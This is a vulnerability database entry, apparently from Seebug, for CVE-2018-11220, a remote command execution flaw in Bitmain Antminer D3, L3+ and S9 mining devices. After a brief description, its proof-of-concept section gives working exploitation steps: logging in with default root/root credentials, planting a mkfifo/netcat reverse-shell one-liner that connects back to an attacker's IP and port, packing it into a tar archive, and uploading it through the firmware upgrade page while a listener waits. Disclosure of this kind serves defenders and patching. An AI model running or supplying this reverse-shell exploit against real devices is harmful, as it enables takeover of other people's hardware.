Lucene search
My SeebugSSV:97314HistoryMay 28, 2018 - 12:00 a.m.
Bitmain Antminer D3/L3+/S9 - Remote Command Execution(CVE-2018-11220)
2018-05-2800:00:00
My Seebug
www.seebug.org
83
0.019 Low
EPSS
Percentile
88.6%
- Exploit Title: Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution
- Google Dork: N/A
- Date: 27/05/2018
- Exploit Author: Corrado Liotta
- Vendor Homepage: https://www.bitmain.com/
- Software Link: N/A
- Version: Antminer - D3, L3+, S9, and other
- Tested on: Windows/Linux
- CVE : CVE-2018-11220
Description
The software used by the miners produced by the bitmain (AntMiner) is affected by a vulnerability of remote code execution type, it is possible through the “Retore Backup” functionality of the administration portal to execute commands on the system. This would allow a malicious user with valid credentials to access the entire file system with administrative privileges.
POC
Login on Antminer Configuration Portal (Default Credential: root/root)
- Create a file named:
- insert inside:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port
>/tmp/f
- Generate archive by inserting the file created before:
Exploit.tar
- Launch net cat and upload file:
nc -vv -l -p port
system –> upgrade –> upload archive
Related
zdt
zdt
Bitmain Antminer D3/L3+/S9 - Remote Command Execution Vulnerability
2018-05-28 00:00:00
exploitpack
exploitpack
Bitmain Antminer D3L3+S9 - Remote Command Execution
2018-05-27 00:00:00
prion
prion
Command injection
2018-05-31 15:29:00
packetstorm
packetstorm
Bitmain Antminer D3/L3+/S9 Remote Command Execution
2018-05-27 00:00:00
cve
cve
CVE-2018-11220
2018-05-31 15:29:00
cvelist
cvelist
CVE-2018-11220
2018-05-31 15:00:00
nvd
nvd
CVE-2018-11220
2018-05-31 15:29:00
exploitdb
exploitdb
Bitmain Antminer D3/L3+/S9 - Remote Command Execution
2018-05-27 00:00:00